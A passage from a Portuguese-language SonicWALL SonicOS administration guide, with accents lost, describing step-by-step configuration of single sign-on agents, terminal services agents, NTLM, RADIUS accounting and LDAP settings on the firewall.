informaes sobre a verificao de estouros de buffer de anel e estatsticas relacionadas
no TSR do SonicOS, consulte Ajustando configuraes avanadas do Login nico na
pgina 1055.
Etapa 7 Clique na guia Configuraes gerais em Configuraes do agente de autenticao para
configurar as seguintes opes:
Selecione a caixa de seleo Habilitar autenticao do agente SSO para usar o Agente
SSO para a autenticao de usurio.
Selecione a caixa de seleo Tentar que o prximo agente no obtenha nenhum nome
do NetAPI/WMI para forar uma nova tentativa de autenticao por meio de um agente
SSO diferente se no houver nenhuma resposta ou um erro do primeiro agente. Isso afeta
somente os agentes que utilizam o NetAPI/WMI.
Selecione a caixa de seleo No bloquear trfego de usurio ao aguardar pelo SSO
para usar a poltica padro enquanto o usurio est sendo identificado. Isso evita atrasos
na navegao.
Selecione a caixa de seleo Incluindo e o boto de opo Todas as regras de acesso
ou Regras de acesso selecionadas para permitir o trfego afetado pelas regras de
acesso que exige a autenticao de usurio, enquanto aguarda pela identificao do
usurio.
Cuidado Ateno: Isso pode temporariamente permitir o acesso que no seria permitido quando o
usurio identificado.

Etapa 8 Clique na guia Usurios para exibir a pgina Configuraes de usurio para especificar as
opes a seguir:
Selecione a caixa de seleo Permitir somente usurios listados localmente para

permitir que somente usurios listados localmente no dispositivo sejam autenticados.
Selecione a caixa de seleo Nomes de usurio simples no banco de dados local para
utilizar nomes de usurio simples. Ao ser selecionado, o componente de domnio de um
nome de usurio ser ignorado. Os nomes de usurio retornados do agente de
autenticao geralmente incluem um componente de domnio como, por exemplo,
domnio1/usurio1. Se esta caixa no estiver marcada, os nomes de usurio no banco de
dados local devem corresponder exatamente aos nomes completos retornados do agente,
incluindo o componente de domnio.
Selecione a caixa de seleo Permitir acesso limitado a usurios fora do domnio para
permitir acesso limitado a usurios que esto conectados a um computador, mas no em
um domnio. Estes usurios no recebero a associao do grupo Usurios confiveis,
mesmo quando definidos localmente e, portanto no tero nenhum acesso definido para
os Usurios confiveis. Eles so identificados nos logs como nome-do-computador/nome-
de-usurio.
Ao usar o banco de dados de usurios locais para autenticar usurios, se a opo Nomes
de usurio simples no banco de dados local estiver desabilitada, os nomes de usurio
devem ser configurados no banco de dados local usando a identificao completa nome-
do-computador/nome-de-usurio.
Se sua rede incluir computadores com Windows ou dispositivos sem Windows com
firewalls pessoais em execuo, selecione a caixa de seleo Investigar usurio sobre
e, em seguida, selecione NetAPI sobre NetBIOS, NetAPI sobre TCP ou WMI, dependendo
de qual esteja configurado para o Agente SSO. Isso faz com que o firewall investigue uma

resposta na porta NetAPI/WMI antes de solicitar que o Agente SSO identifique um usurio.
Se nenhuma resposta ocorrer, nesses dispositivos causaro uma falha no SSO
imediatamente. Esses dispositivos no respondem ou podem bloquear as mensagens de
rede do Windows utilizadas pelo Agente SSO para identificar um usurio. O Tempo limite
(segundos) de investigao definido como 5 segundos por padro.
Selecione a caixa de seleo Modo do teste de investigao para permitir testes de
investigaes do SSO, para investigar se ela est funcionando corretamente durante o
SSO, sem interferir nas autenticaes de usurio. As investigaes so enviadas aps a
inicializao da autenticao de usurio por meio do Agente SSO.
Para usar o LDAP para recuperar informaes de usurio, selecione o boto de opo
Usar LDAP para recuperar informaes de grupo de usurios . Clique em Configurar
para definir as configuraes do LDAP. A pgina de Configurao do LDAP exibida. Para
obter informaes de configurao para esta pgina, consulte Configurao avanada do
LDAP na pgina 1046.
Para usar as configuraes do grupo de usurios definida localmente, selecione o boto
de opo Configurao local.
No campo Taxa de pesquisa (minutos), insira um intervalo de pesquisa, em minutos (o
padro 1). O dispositivo de segurana pesquisar a estao de trabalho que executa o
Agente SSO uma vez a cada intervalo para verificar se os usurios ainda esto
conectados.
No campo Tempo de espera aps (minutos), insira um tempo, em minutos, que o
dispositivo de segurana aguardar antes de realizar uma nova tentativa de identificar o
trfego aps uma falha inicial ao faz-lo. Este recurso limita a taxa de solicitaes para o
agente. O padro 1.
Selecione a caixa de seleo Pesquisar o mesmo agente que autenticou o usurio se
a topologia de rede exigir que agentes especficos sejam utilizados, dependendo do local
dos usurios, em vez de pesquisar qualquer agente para determinar se o usurio ainda
est conectado.
Em aps no encontrar nenhum usurio, insira o nmero de minutos que o dispositivo
dever aguardar antes de realizar uma nova tentativa se ele obtiver erros do agente SSO
ou nos casos em que o agente relatar que nenhum usurio est conectado.
Etapa 9 Para preencher a lista Nomes de usurio utilizados pelos servios do Windows, clique no
boto Adicionar. Na caixa de dilogo Nome de usurio do servio, digite o nome de login do
servio (somente o nome simples, sem o domnio ou o nome do PC) em Insira o nome de uma
conta de usurio utilizada por um servio do Windows e, em seguida, clique em OK.
O objetivo desta lista distinguir os nomes de login utilizados pelos servios do Windows
dos logins de usurios reais. Quando o Agente SSO consulta o Windows para localizar o
usurio conectado a um computador, o Windows, na verdade, retorna uma lista de contas
de usurio que esto/foram conectados ao computador e no faz distino de logins de
usurio dos logins de servio, no fornecendo ao Agente SSO, portanto, uma maneira de
determinar que um nome de login pertence a um servio. Isso pode fazer com que o Agente
SSO relate incorretamente um nome de servio em vez do nome real de usurio.

possvel digitar aqui at 64 nomes de login que podem ser utilizados por servios nos
computadores de usurios finais. O Agente SSO ignorar quaisquer logins com esses
nomes.
Se, ao usar o Login nico, voc observar nomes de usurio inesperados mostrados na
pgina Usurios > Status ou logs de logins de usurios ou falha no login de usurio com
nomes de usurio inesperados, eles podem ser devido a logins de servio do Windows;
esses nomes de usurio devem ser configurados aqui para que o Agente SSO saiba
ignor-los.
Nos casos em que existam vrios firewalls se comunicando com um Agente SSO, a lista
de nomes de contas de servio deve ser configurada em somente um deles. O efeito da
configurao de vrias listas em dispositivos diferentes indefinido.
Etapa 10 Para editar um nome de conta de servio existente, selecione o nome e clique em Editar. Faa
as alteraes desejadas na caixa de dilogo Nome de usurio do servio e, em seguida, clique
em OK.
Para remover nomes de contas de servio, selecione um ou mais nomes e, em seguida, clique
em Remover.
Etapa 11 Clique na guia Imposio , se desejar acionar o SSO no trfego de uma zona especfica ou
desviar o SSO para o trfego de dispositivos de no usurios, como servidores proxy internos
da web ou telefones IP.
Em Imposio do SSO por zona, selecione as caixas de seleo para todas as zonas
que voc deseja acionar o SSO para identificar usurios quando o trfego for enviado.
Se o SSO j for solicitada em uma zona por Controle de aplicativos ou outras polticas,
essas caixas de seleo sero pr-selecionadas e no podero ser limpas. Se os
Servios de convidados estiverem habilitados em uma zona, o SSO no poder ser
imposto e no ser possvel selecionar a caixa de seleo.

Estas configuraes de imposio do SSO por zona so teis para identificar e rastrear
os usurios no registro em log de eventos e nas visualizaes de Monitoramento do
AppFlow, mesmo quando o SSO no acionada por polticas de filtragem de contedo,
IPS ou Controle de aplicativos ou pelas regras de acesso do firewall que exigem a
autenticao do usurio.
Nas zonas nas quais as polticas de servios de segurana ou as regras de acesso do
firewall estejam definidas para exigir a autenticao do usurio, o SSO ser sempre
iniciada para o trfego afetado e no ser necessrio habilitar a imposio do SSO aqui
tambm.
Para ignorar o SSO para o trfego de determinados dispositivos ou locais e aplicar a
poltica de filtragem de contedo padro ao trfego, selecione o objeto de endereo
adequado ou o grupo de endereos no primeiro menu suspenso em Desvio do SSO.
Para ignorar o SSO para determinados servios ou tipos de trfego, selecione o
servio no segundo menu suspenso.
A primeira configurao utilizada nos casos em que o trfego que estaria sujeito
filtragem dos servios de segurana possa surgir de um dispositivo diferente da
estao de trabalho de um usurio (como um servidor proxy interno da web ou um
telefone IP). Ela impede que o SonicWALL tente identificar esse dispositivo como um
usurio da rede, a fim de selecionar a poltica de filtragem de contedo que ser
aplicada. A poltica de filtragem de contedo padro ser utilizada para todo o trfego
dos endereos IP selecionados.
A segunda configurao adequada para o trfego de usurio que no precise ser
autenticado; acionar o SSO poder causar um atraso inaceitvel do servio.
As configuraes de desvio do SSO no so aplicadas quando o SSO acionado pelas
regras de acesso do firewall que exijam a autenticao do usurio. Para configurar
esse tipo de desvio do SSO, adicione regras de acesso que no exijam a autenticao
do usurio para o trfego afetado. Consulte Adicionar regras de acesso na pgina 560
para obter mais informaes sobre a configurao das regras de acesso.
Nota Por padro, os usurios do Linux e Mac que no so autenticados pelo SSO por meio do
Samba so atribudos poltica de filtragem de contedo padro. Para redirecionar todos
esses usurios no autenticados pelo SSO a inserir manualmente suas credenciais, crie
uma regra de acesso na zona WAN para a zona LAN no servio HTTP, com Usurios

permitidos definido como Todos. Em seguida, configure a poltica do CFS adequada para
os usurios ou grupos de usurios. Consulte Adicionar regras de acesso na pgina 560
para obter mais informaes sobre a configurao das regras de acesso.
Etapa 12 Clique na guia Servios de terminal para exibir a pgina de Configuraes do Agente de
servios de terminal.
Clique na guia Agentes de servios de terminal e, em seguida, clique no boto

Adicionar. A pgina atualizada para exibir uma nova linha na tabela na parte superior
e novos campos de entrada na metade inferior da pgina. Para os agentes existentes,
um cone de estilo LED verde ao lado de um agente indica que o agente est ativo e
em execuo. Um cone de LED vermelho indica que o agente est inativo. Um cone
de LED amarelo significa que o TSA est ocioso e que o dispositivo no escutou
nenhuma informao dele por 5 minutos ou mais. Como o TSA envia notificaes para
o dispositivo em vez do dispositivo enviar solicitaes para o agente, a falta de
notificaes poderia significar a ocorrncia de um problema, porm mais
provavelmente significa que nenhum usurio no servidor do terminal est ativo no
momento.
No campo Nome do host ou endereo IP, digite o nome ou endereo IP do terminal
do servidor no qual o SonicWALL TSA est instalado. Se o servidor do terminal tiver
hospedagem mltipla (tiver vrios endereos IP) e voc estiver identificando o host
pelo endereo IP em vez do nome DNS, digite todos os endereos IP como uma lista
separada por vrgulas.
Ao digitar valores nos campos, a linha na parte superior atualizada em vermelho para
destacar as novas informaes.
Em Porta, insira o nmero da porta que o SonicWALL TSA est utilizando para se
comunicar com o dispositivo. A porta padro 2259. Observe que os agentes em
endereos IP diferentes podem ter o mesmo nmero de porta.

No campo Chave compartilhada, insira a chave compartilhada criada ou gerada no
SonicWALL TSA. A chave compartilhada deve ter uma correspondncia exata. Insira
novamente a chave compartilhada no campo Confirmar chave compartilhada.
Etapa 13 Clique na guia Configuraes gerais em Configuraes do Agente de servios de terminal
para configurar as seguintes opes:
Selecione a caixa de seleo Habilitar autenticao do agente de servio de
terminal para usar o TSA para a autenticao de usurio.
A caixa de seleo Permitir trfego de servios no servidor do terminal para
ignorar a autenticao do usurio nas regras de acesso selecionada por padro.
Isso permite que o trfego, como atualizaes do Windows ou atualizaes de
antivrus, que no esteja associado a nenhuma sesso de login do usurio, passe sem
autenticao. Se esta caixa de seleo for desmarcada, o trfego de servios pode ser
bloqueado se as regras de acesso do firewall exigirem a autenticao do usurio.
Nesse caso, possvel adicionar regras para permitir o acesso para Todos aos
destinos de trfego de servios ou configurar os destinos como URLs do HTTP que
possam ignorar a autenticao do usurio nas regras de acesso.
Etapa 14 Clique na guia NTLM. A pgina de Autenticao de NTLM no navegador exibida.
A autenticao de NTLM suportada por navegadores com base no Mozilla e pode ser
utilizada como um suplemento para identificar usurios por meio de um agente SSO ou, com
algumas limitaes, por conta prpria sem o agente. O firewall interage diretamente com o
navegador para autenticar o usurio. Os usurios conectados com credenciais de domnio so
autenticados de forma transparente; em outros casos, talvez seja necessrio que o usurio
insira as credenciais para efetuar login no dispositivo, mas ele precisar fazer isso s uma vez
j que as credenciais so salvas.

Consulte as dicas de ferramentas nesta guia para obter detalhes adicionais e consulte Como
funciona a Autenticao de NTLM do navegador? na pgina 965 para obter mais informaes.
Selecione uma das opes a seguir na lista suspensa Usar NTLM para autenticar o
trfego HTTP:
Nunca Nunca use a autenticao de NTML
Antes de tentar o SSO por meio do agente Tente autenticar usurios com o
NTLM antes de usar o agente SSO do SonicWALL
Somente em caso de falha do SSO por meio do agente Tente autenticar
usurios por meio do agente SSO primeiro; em caso de falha, tente usar o NTLM
Para Domnio de autenticao, faa o seguinte:
Insira o nome completo do DNS do domnio do firewall no formato
www.somedomain.com
Selecione a caixa de seleo Usar o domnio de configurao do LDAP para
usar o mesmo domnio que utilizado na configurao do LDAP.
A autenticao totalmente transparente s pode ocorrer se o navegador considerar o
domnio do dispositivo como o domnio local.
Para Redirecionar o navegador para este dispositivo por meio do, selecione uma
das opes a seguir para determinar a forma como o navegador de um usurio
inicialmente redirecionado para o servidor da web do prprio firewall:
O endereo IP da interface Selecione esta opo para redirecionar o navegador
para o endereo IP da interface do servidor da web do dispositivo.
Seu nome de domnio a partir de uma pesquisa reversa do DNS do endereo
IP da interface Habilita o boto Mostrar cache reverso do DNS localizado na
parte inferior da janela; quando clicado, uma pop-up exibe a Interface do servidor
da web do dispositivo, Endereo IP, Nome DNS e TTL em alguns segundos. Clique
no boto para verificar o nome de domnio (nome DNS) que est sendo utilizado
para redirecionar o navegador do usurio.
Seu nome de domnio configurado Use o nome de domnio do firewall,
conforme configurado em Sistema > Administrao.
O nome do certificado de administrao Use o certificado importado que est
selecionado para o Gerenciamento do HTTPS na web na pgina Sistema >
Administrao.
Insira um nmero de repeties em Nmero mximo de repeties a serem
permitidas em caso de falha na autenticao.
Para detectar quando os usurios efetuam logout, selecione o mtodo de pesquisa que
ser utilizado pelo dispositivo para os usurios do Macintosh, Linux e Windows nas
opes No temporizador de pesquisa, para usurios autenticados por meio do
NTLM. Selecione o boto de opo para um dos mtodos a seguir para os usurios de
cada tipo de computador:
Pesquisar por meio do agente SSO Se estiver usando um Agente SSO em sua
rede, selecione esta opo para us-lo para pesquisar seus usurios; para os
usurios autenticados por meio do NTLM, o nome de usurio que o agente
descobre deve corresponder ao nome de usurio para a autenticao de NTLM ou
a sesso de login ser encerrada. Voc pode desejar selecionar um mtodo de
pesquisa diferente para os usurios do Linux ou MacOS, j que esses sistemas
no oferecem suporte s solicitaes e rede do Windows utilizadas pelo agente
SSO.

Autenticar novamente por meio do NTLM Este mtodo ser transparente para
o usurio se o navegador estiver configurado para armazenar as credenciais de
domnio ou se o usurio instruiu o navegador a salvar as credenciais.
No autenticar novamente Se esta opo for selecionada, o logout s ser
detectado por meio do tempo limite de inatividade.
Se estiver usando servidores legados mais antigos que exijam que os componentes
legados do LAN Manager sejam includos nas mensagens do NTLM, selecione a caixa
de seleo Encaminhar LanMan legado no NTLM. Isso pode causar uma falha na
autenticao dos servidores do Windows mais recentes que no permitem o LanMan
no NTLM por padro, pois ele no seguro.
Etapa 15 Clique na guia Contabilizao RADIUS para exibir a pgina de Login nico da Contabilizao
RADIUS.
O Login nico pela contabilizao RADIUS permite que o dispositivo atue como um servidor
de contabilizao RADIUS para dispositivos de terceiro externos e conecte ou desconecte
usurios com base nas mensagens de contabilizao desses dispositivos. O SonicOS tambm
pode ser configurado para encaminhar as mensagens de contabilizao para outro servidor de
contabilizao RADIUS.
Etapa 16 Clique na guia Testar para exibir a pgina de Configuraes do Agente de autenticao de
teste.
Nota Observe que esta opo aplicar quaisquer alteraes que tenham sido realizadas.

possvel testar a conectividade entre o dispositivo e um agente SSO ou TSA. Tambm
possvel testar se o agente SSO est corretamente configurado para identificar um usurio
conectado em uma estao de trabalho. Se voc tiver vrios agentes configurados,
selecione o agente SSO ou TSA que ser testado na lista suspensa Selecione agente a
ser testado. A lista suspensa inclui os agentes SSO na parte superior e do TSA ao final
do cabealho Terminal Server Agents .
Selecione o boto de opo Verificar conectividade do agente e, em seguida, clique
no boto Testar. Isso testar a comunicao com o agente de autenticao. Se o
firewall capaz de estabelecer uma conexo com o agente SSO, a mensagem O
agente est pronto ser exibida. Se um TSA for testado, o campo Status do teste
exibir a mensagem e a verso e o endereo IP do servidor sero exibidos no campo
Informaes retornadas do agente.

Somente para os agentes SSO, selecione o boto de opo Verificar usurio, digite o
endereo IP de uma estao de trabalho no campo Endereo IP da estao de trabalho
e, em seguida, clique em Testar. Isso testar se o agente SSO est corretamente
configurado para identificar o usurio conectado em uma estao de trabalho.
Dica Se voc receber mensagens de O agente no est respondendo ou Erro de

configurao, verifique suas configuraes e realize esses testes novamente.
Etapa 17 Ao concluir toda a configurao do Agente de autenticao, clique em OK.
Configurando a contabilizao RADIUS para o SSO

A contabilizao RADIUS para Login nico est configurada na pgina Usurios >
Configuraes .
Para configurar a contabilizao RADIUS para o SSO, siga estas etapas:
Etapa 1 Exiba a pgina Usurios > Configuraes.
Etapa 2 Clique no boto Configurar SSO. A caixa de dilogo Configurao de autenticao do SSO
exibida.

Etapa 3 Clique na guia Contabilizao RADIUS.
Etapa 4 Para adicionar um cliente RADIUS, clique no boto Adicionar. As guias Configuraes,
RADIUS e Encaminhando so exibidas na parte inferior da tela.
Repita essas etapas para cada cliente de contabilizao RADIUS que voc deseja
adicionar; cada cliente de contabilizao RADIUS que voc adicionar est listado no painel
de Login nico da Contabilizao RADIUS.
A coluna Status mostra o status atual de cada cliente de contabilizao RADIUS listado no
painel da seguinte maneira:
Verde o cliente est ativo
Amarelo o cliente est ocioso

Etapa 5 Clique na guia Configuraes para inserir as seguintes informaes:
No campo Nome ou endereo IP do host do cliente, digite o nome ou o endereo IP

do host do cliente do RADIUS.
Nos campos Segredo compartilhado e Confirmar segredo, insira o segredo
compartilhado do cliente.
Etapa 6 Clique na guia RADIUS para especificar as opes de usurio.
Na lista suspensa Formato do atributo do nome de usurio, selecione o formato do

login do nome de usurio.
Selecione a caixa de seleo Desconectar usurio se no forem recebidas
atualizaes provisrias de contabilizao e, em seguida, insira o perodo de tempo
em minutos aps o qual o usurio ser desconectado.
Etapa 7 Clique na guia Encaminhando para definir as configuraes de entrega de mensagens para
at quatro servidores de contabilizao RADIUS.
Insira o nome/endereo IP, nmero da porta UDP e segredo compartilhado de cada

servidor.
Em Tempo limite, insira o perodo de tempo limite em segundos.
Em Repeties, digite o nmero de repeties.

Tentar aps tempo limite Caso o tempo limite de um servidor expire, o SonicOS
utilizar o prximo servidor na lista para encaminhar as mensagens.
Encaminhar para todos O SonicOS encaminhar as mensagens para todos os
servidores na lista.
Etapa 8 Clique na guia Configuraes gerais para inserir as seguintes informaes:
Para usar a contabilizao RADIUS para o SSO, selecione a caixa de seleo Habilitar
SSO pela contabilizao RADIUS.
Em Porta, digite o nmero da porta UDP para a escuta da contabilizao RADIUS.

Configurao avanada do LDAP
Se tiver selecionado Usar LDAP para recuperar informaes de grupo de usurios na guia
Usurios, conforme descrito em Configurando o SonicOS para utilizar o Agente SSO do
SonicWALL na pgina 1030, ser necessrio definir as configuraes do LDAP.
Para definir as configuraes do LDAP, realize as seguintes etapas:
Etapa 1 Na guia Usurios na janela Configurar SSO, clique no boto Configurar ao lado da opo
Usar LDAP para recuperar informaes de grupo de usurios.
Etapa 2 A guia Configuraes exibida. No campo Nome ou endereo IP , digite o nome ou o
endereo IP do seu servidor do LDAP.
Etapa 3 No campo Nmero da porta, digite o nmero da porta de seu servidor do LDAP. As portas
LDAP padro so:
Porta LDAP padro (389)
Porta LDAP padro sobre TLS (636)
Etapa 4 No campo Tempo limite do servidor (segundos), digite um nmero de segundos que o
firewall aguardar por uma resposta do servidor do LDAP antes que a tentativa expire. Os
valores selecionveis encontram-se entre 1 e 99999. O padro 10 segundos.
Etapa 5 No campo Tempo limite geral da operao (minutos), digite um nmero de minutos que o
firewall levar em qualquer operao automtica antes do tempo limite expirar. Os valores
selecionveis encontram-se entre 1 e 99999. O padro 5 segundos.

Etapa 6 Selecione o boto de opo Login annimo para efetuar login de forma annima. Alguns
servidores do LDAP permitem que a rvore seja acessada de forma annima. Se seu servidor
oferecer suporte para essa opo (o MS AD geralmente no oferece), ento possvel
selecionar esta opo.
Selecione Fornecer nome de login/local na rvore para acessar a rvore com o
nome de login.
Selecione Fornecer o nome distinto de ligao para acessar a rvore com o nome
distinto.
Etapa 7 Para efetuar login com um nome de usurio e senha, digite o nome do usurio no campo Nome
de usurio de login e a senha no campo Senha de login. O nome de login ser apresentado
automaticamente para o servidor do LDAP na notao dn completa.
Nota Use o nome de usurio no campo Nome de usurio de login, e no um nome de usurio
ou a ID do login. Por exemplo, Joo da Silva seria o login de Joo da Silva, e no jsilva.
Etapa 8 Selecione a verso do LDAP no menu suspenso Verso do protocolo ou Verso 2 do LDAP
ou Verso 3 do LDAP. A maioria das implementaes do LDAP, incluindo o AD, utilizam a
verso 3 do LDAP.
Etapa 9 Selecione a caixa de seleo Usar TLS (SSL) para usar a Transport Layer Security (SSL) para
efetuar login no servidor do LDAP. altamente recomendvel usar o TLS para proteger as
informaes de nome do usurio e senha que sero enviadas pela rede. A maioria das
implementaes do servidor do LDAP, incluindo o AD, oferecem suporte ao TLS.
Etapa 10 Selecione a caixa de seleo Enviar solicitao Iniciar TLS ao LDAP para permitir que o
servidor do LDAP opere no modo TLS e fora do TLS na mesma porta TCP. Algumas
implementaes do servidor do LDAP oferecem suporte para a diretiva Iniciar TLS em vez do
uso do LDAP nativo sobre TLS. Isso permite que o servidor do LDAP escute em uma nica
porta (geralmente 389) para as conexes do LDAP e alterne para o TLS, conforme indicado
pelo cliente. O AD no usa essa opo e ele deve ser selecionado somente se solicitado pelo
servidor do LDAP.
Nota Marque somente a caixa Enviar solicitao Iniciar TLS ao LDAP se seu servidor do
LDAP usar o mesmo nmero de porta para o TLS e fora do TLS.
Etapa 11 Selecione a caixa de seleo Solicitar certificado vlido do servidor para exigir um
certificado vlido do servidor. Valida o certificado apresentado pelo servidor durante a troca do
TLS, fazendo a correspondncia do nome especificado acima com o nome no certificado.
Desmarcar essa opo padro exibir um alerta, mas as trocas entre o firewall e o servidor do
LDAP ainda utilizaro o TLS somente na validao sem emisso.
Etapa 12 Selecione um certificado local no menu suspenso Certificado local para o TLS. Opcional, a
ser utilizado somente se o servidor do LDAP solicitar um certificado do cliente para as
conexes. Este recurso til para as implementaes do servidor do LDAP que retornam
senhas para garantir a identidade do cliente do LDAP (o AD no retorna senhas). Esta
configurao no necessria para o AD.

Etapa 14 Clique na guia Esquema.
Etapa 15 No menu suspenso Esquema LDAP, selecione um dos seguintes esquemas do LDAP.
Selecionar qualquer um dos esquemas predefinidos preencher automaticamente os campos
utilizados por esse esquema com seus valores corretos. Selecionar definido pelo usurio
permitir que voc especifique seus prprios valores use esta opo somente se voc tiver
uma configurao de esquema do LDAP especfica ou exclusiva.
RFC2798 InetOrgPerson
Samba SMB
Novell eDirectory
Definido pelo usurio
Etapa 16 O campo Classe de objeto define quais atributos representaro a conta de usurios
individuais aos quais se aplicam os dois campos a seguir. Isso no ser modificvel, a menos
que a opo Definido pelo usurio seja selecionada.
Etapa 17 O campo Atributo de nome de login define qual atributo utilizado para a autenticao de
login. Isso no ser modificvel, a menos que a opo Definido pelo usurio seja
selecionada.
Etapa 18 Se o campo Atributo do nome de login qualificado no estiver vazio, ele especifica um
atributo de um objeto de usurio que define um nome de login alternativo para o usurio no
formato nome@domnio. Isso pode ser necessrio com vrios domnios em particular, nos
quais o nome de login simples pode no ser exclusivo nos domnios. Isso definido para
correspondncia para o Microsoft Active Directory e o RFC2798 inetOrgPerson.

Etapa 19 O atributo de associao de grupo de usurios campo contm as informaes no objeto de
usurio de quais grupos ele pertence. Ele designado memberOf no Microsoft Active
Directory. Os outros esquemas predefinidos armazenam informaes de associao a grupos
no objeto de grupo em vez de no objeto de usurio e, portanto, no utilizam este campo.
Etapa 20 O campo atributo de endereo IP com moldura pode ser utilizado para recuperar um
endereo IP esttico atribudo a um usurio no diretrio. Atualmente, ele utilizado somente
para um usurio que esteja se conectando por meio do L2TP com o servidor do L2TP do
firewall. Em verses futuras, ele tambm poder ser suportado para o Cliente Global da VPN
do SonicWALL (GVC). No Active Directory, o endereo IP esttico configurado na guia Discar
das propriedades de um usurio.
Etapa 21 O campo Classe de objeto define os tipos de entradas que um diretrio do LDAP pode conter.
Um exemplo de classe de objeto, conforme utilizada pelo AD, seria usurio ou grupo.
Etapa 22 O campo Atributo do membro define qual atributo utilizado para a autenticao de login.
Etapa 23 Selecione a guia Diretrio.
Etapa 24 No campo Domnio primrio campo, especifique o domnio de usurio utilizado pelo seu
implementao de LDAP. Para o AD, ele ser o nome de domnio do Active Directory como,
yourADdomain.com. As alteraes feitas neste campo, opcionalmente, atualizaro
automaticamente as informaes da rvore no restante da pgina. Isso definido para
mydomain.com por padro para todos os esquemas, exceto o Novell eDirectory, para o qual
ele definido como o=mydomain.
Etapa 25 No campo rvore do usurio para login no servidor, especifique a rvore na qual o usurio
especificado na guia Configuraes reside. Por exemplo, no AD, a rvore padro da conta do
administrador a mesma que a rvore do usurio.

Etapa 26 No campo rvores que contm usurios, especifique as rvores onde os usurios
geralmente residem no diretrio do LDAP. Um valor padro que pode ser editado fornecido,
um mximo de 64 valores de DN pode ser fornecido e o firewall procura no diretrio, at que
uma correspondncia seja encontrada ou a lista seja esgotada. Se voc criou outros
recipientes de usurio em seu diretrio do LDAP ou AD, especifique-os aqui.
Etapa 27 No campo rvores que contm grupos de usurios, especifique as rvores onde os grupos
de usurios geralmente residem no diretrio do LDAP. Um mximo de 32 valores de DN pode
ser fornecido. Eles se aplicam somente aos casos em que no h nenhum atributo de
associao a grupos do usurio no objeto de usurio do esquema e nos casos em que ela no
utilizada com o AD.
As rvores mencionadas acima so geralmente fornecidas em formato URL, mas tambm
podem ser especificadas como nomes distintos (por ex., myDom.com/Sales/Users poderia,
opcionalmente, ser fornecido como o DN ou=Users,ou=Sales,dc=myDom,dc=com). O ltimo
formato ser necessrio se o DN no estiver de acordo com as regras de formatao normais,
conforme esse exemplo. No Active Directory a URL correspondente para o nome distinto para
uma rvore exibido na guia objeto nas propriedades do continer na parte superior da rvore.
Nota O AD tem alguns recipientes internos que no so compatveis (por ex., o DN para o
recipiente de Usurios de nvel superior est formatado como cn=Users,dc=, usando
cn em vez de ou), mas o SonicWALL conhece e lida com eles, para que eles possam ser
inseridos no formato URL mais simples.
A ordem no fundamental, mas j que eles so pesquisados na ordem fornecida, mais

eficiente colocar as rvores mais utilizadas primeiro em cada lista. Se recomendaes
entre vrios servidores do LDAP precisarem ser utilizadas, ento as rvores so mais bem
ordenadas com elas no servidor primrio primeiro e o restante na mesma ordem que sero
consultadas.
Nota Ao trabalhar com o AD, para localizar o local de um usurio no diretrio para o campo
rvore do usurio para login no servidor, o diretrio pode ser pesquisado manualmente
no miniaplicativo do painel de controle Usurios e Configuraes do Active Directory no
servidor. Como alternativa, um utilitrio de pesquisa de diretrio como o queryad.vbs no Kit
de Recursos do Windows NT/2000/XP pode ser executado em qualquer PC no domnio.
Etapa 28 O boto Configurar automaticamente faz com que o firewall configure automaticamente os
campos rvores que contm usurios e rvores que contm grupos de usurios pela
verificao por meio do diretrio/diretrios que procuram todas as rvores que contm os
objetos de usurio. A rvore de usurio para login no servidor deve ser definida primeiro.
Selecione se deseja acrescentar novas rvores localizadas para a configurao atual ou
comear do zero, removendo primeiro todas as rvores configuradas no momento e, em
seguida, clique em OK. Observe que ele muito provavelmente localizar rvores que no so
necessrias para o login de usurio. recomendado remover manualmente essas entradas.
Se estiver utilizando vrios servidores do LDAP/AD com recomendaes, este processo pode
ser repetido para cada uma delas, substituindo o valor Domnio a ser pesquisado de forma
adequada e selecionando Anexar s rvores existentes em cada execuo posterior.

Etapa 29 Selecione a guia Recomendaes .
Etapa 30 Se vrios servidores LDAP estiverem sendo utilizados em sua rede, podem ser necessrias as
recomendaes do LDAP. Selecione uma ou mais das seguintes caixas de seleo:
Permitir recomendaes Selecione esta opo sempre que as informaes do
usurio estejam localizadas em um servidor do LDAP que no seja o servidor primrio.
Permitir referncias de continuao durante a autenticao do usurio
Selecione esta opo quando as rvores do diretrio individuais abrangerem vrios
servidores do LDAP.
Permitir referncias de continuao durante a configurao automtica do
diretrio Selecione esta opo para ler as rvores do diretrio a partir de vrios
servidores do LDAP na mesma operao.
Permitir referncias de continuao em pesquisas de domnios Selecione esta
opo para procurar subdomnios em vrios servidores do LDAP.
Etapa 31 Selecione a guia Usurios do LDAP.

Etapa 32 Marque a caixa Permitir somente usurios listados localmente para exigir que os usurios
do LDAP tambm estejam presentes no banco de dados de usurios locais do firewall para
permisses de logins.
Etapa 33 Marque a caixa A associao a grupos de usurios pode ser definida localmente pela
duplicao de nomes de usurio do LDAP para permitir que a associao (e privilgios) de
grupos sejam determinados pela interseo das configuraes de usurios locais e de
usurios do LDAP.
Etapa 34 No menu suspenso Grupo de usurios do LDAP padro, selecione um grupo padro no
firewall ao qual os usurios do LDAP pertencero, alm das associaes a grupos
configuradas no servidor do LDAP.
Dica As associaes (e privilgios) a grupos tambm podem ser atribudos simplesmente com o
LDAP. Ao criar grupos de usurios no servidor do LDAP/AD com o mesmo nome que os
grupos internos (como Servios para convidados, Desvios de Filtragem de Contedo e
Administradores limitados), e atribuindo usurios a esses grupos no diretrio ou criando
grupos de usurios no firewall com o mesmo nome que os grupos de usurios do LDAP/AD
existentes, as associaes a grupos sero concedidas automaticamente aos usurios aps
a autenticao do LDAP.
O firewall pode recuperar associaes a grupos de forma mais eficiente no caso do Active
Directory, utilizando sua caracterstica exclusiva de retornar um atributo memberOf para um
usurio.
Etapa 35 Clique no boto Importar grupos de usurios para importar grupos de usurios do servidor
do LDAP. Os nomes de grupos de usurios no servidor do LDAP precisam ser duplicados no
SonicWALL se eles precisarem ser utilizados em regras de polticas, polticas do CFS, etc.

Etapa 36 Selecione a guia Retransmisso LDAP.
Etapa 37 Selecione a caixa de seleo Habilitar RADIUS para Retransmisso LDAP para habilitar o
RADIUS para a retransmisso LDAP. O recurso RADIUS para Retransmisso LDAP
projetado para ser utilizado em uma topologia em que exista um site central com um servidor
do LDAP/AD e um firewall central com sites de satlite remotos conectados a ele, usando
firewalls de baixo nvel que possam no oferecer suporte ao LDAP. Nesse caso, o firewall
central pode operar como um servidor do RADIUS para os firewalls remotos, atuando como um
gateway entre o RADIUS e o LDAP e retransmitindo solicitaes de autenticao deles para o
servidor do LDAP.
Etapa 38 Em Permitir que clientes RADIUS se conectem via, selecione as caixas de seleo
